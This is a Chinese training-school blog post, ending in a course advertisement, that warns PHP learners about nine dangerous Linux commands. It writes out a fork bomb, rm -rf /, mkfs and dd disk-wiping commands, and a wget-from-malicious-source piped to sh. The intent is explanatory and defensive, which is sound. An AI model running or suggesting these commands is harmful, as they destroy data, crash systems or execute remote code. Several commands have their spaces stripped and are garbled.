扣丁学堂盘点PHP开发程序员时刻警惕这九个命令和代码

  在现如今,随着互联网技术飞速的发展,丢失各种数据信息是难免避免的,比如Linuxshell/terminal命令非常强大,即使一个简单的命令就可能导致文件夹、文件或者路径文件夹等被删除。在一些情况下,Linux甚至不会询问你而直接执行命令,导致你丢失各种数据信息。这里我收集了一些对系统有危害的Linux代码,帮助你避免他们。请记住:这些代码非常危险,甚至可以经过修改,变得更加有危害性。

扣丁学堂盘点PHP开发程序员时刻警惕这九个命令和代码_第1张图片

​  还有一些事情需要注意:一些命令只在Ubuntu中有sudo前缀时是有危害的。其他发行版本的Linux,则是在作为根目录命令时会有危害。

 

  1.、LinuxForkBombCommand

 

  :(){:|:&};:以ForkBomb闻名,是一个拒绝服务攻击的Linux系统。:(){:|:&};:是一个bash函数。只要被执行,他会不断重复,直到系统被冻结。

 

  你只能重启系统解决这个问题。所以当你在Linux界面执行这个命令时一定要注意。

 

  2、MvFolder/Dev/NullCommand

 

  mvfolder/dev/null也是一个危险的命令。Dev/null或者nulldevice是一个删除所有写在这个设备文件上数据的设备文件,但是,该操作提示却是写入操作执行成功。这就是我们常说的bitbucked或者blackhole。

 

  3、RmRfCommand

 

  rmrf命令在Linux系统中可以快速删除文件夹及其内容。如果,你不知道如何正确使用它,你就只有哭了。

 

  列下mrf命令最常见的组合和选择:

 

  rmcommand:删除Linux系统的文件

 

  rmfcommand:不需提示,删除文件中的只读文件

 

  rmrcommand循环删除文件夹的内容

 

  rmdcommand:删除空目录,如果非空目录则不会执行该操作

 

  rmrf/command:强制删除根目录中的所有内容和子文件夹(包括写保护文件)命令。

 

  rmrfcommand:强制删除当前目录中的所有内容(当前工作目录)和字文件夹

 

  rmrf.command:强制删除当前文件夹目录/子目录中的所有内容。同rmr.[^.]

 

  Thermr.[^.]command:删除文件及文件夹,带有删除提示

 

  4、MkfsCommand

 

  如果你不知mkfs的作用,那么它也是一个危险的命令,mkfs之后写的任何命令都将会被一个空白的linux文件系统格式化、替代。

 

  下面列举出需要管理员权限,格式化硬盘的命令:

 

  mkfs

 

  mkfs.ext3

 

  mkfs.bfs

 

  mkfs.ext2

 

  mkfs.minix

 

  mkfs.msdosmkfs.reiserfs

 

  mkfs.vfat

 

  mkfs.cramfs也可以和上面的代码做同样的事情,不过不需要管理源权限。

 

  5、TarBomb

 

  tar命令用于将多个文件以.tar格式放入一个文件中(存档文件)。TapeArchive(Tar)bomb可以由他创建。

 

  当为压缩时,就是这个存档文件生成数以万计的相似名称文件出现在当前目录中而不是新目录。

 

  当收到tar文件,定期创建一个新的保护目录,然后在解压前将接受的tar文件放到这个目录中,你可以避免成为tarbomb的受害者。

 

  6、DdCommand

 

  Dd命令用于复制&改变硬盘分区。如果,你用错地方了,那么也很危险。

 

  下面列举dd命令:

 

  ddif=/dev/hdaof=/dev/hdb

 

  ddif=/dev/hdaof=/dev/sdb

 

  ddif=somethingof=/dev/hda

 

  ddif=somethingof=/dev/sda

 

  下面这个命令会将整个主硬盘清零:ddif=/dev/zeroof=/dev/had

 

  7、ShellCode

 

  有时候,你可能会被人坑,给你一个shell脚本文件,让你去下载并执行它。该脚本可能会包含一些恶意的或危险的代码。命令形式可能会是这样:wgethttp://some_malicious_sourceO|sh。wget将会在sh狭隘脚本时下载脚本。

 

  8、MaliciousSourceCode

 

  也许有人会给你源代码让你编译他。代码可能是正常代码,不过,有一些恶意代码伪装在大型源代码中,如果是这样,你的系统就中枪了。如何避免?仅接受并编译可信赖来源的源代码。

 

  9、DecompressionBomb

 

  你已经收到一个压缩文件,你被要求提取这个看起来很小的文件,可能小到KB。事实上,该小尺寸的压缩文件包含高度压缩数据。

 

  只要文件解压,上百GB数据会被提取,这时候,过大的数据填满硬盘导致宕机,几率就很大了。如何避免?还是那句老话,别手贱,什么文件都去接收,请接收可信任来源文件。

 

  最后希望对同学们有所帮助。想要学习PHP培训技术的小伙伴欢迎选择扣丁学堂进行学习。扣丁学堂不仅有专业的老师和与时俱进的课程体系,还有大量的PHP视频教程供学员观看学习,想要学到实用技术高薪就业的小伙伴抓紧时间行动吧。扣丁学堂PHP技术交流群:374332265。

你可能感兴趣的:(PHP)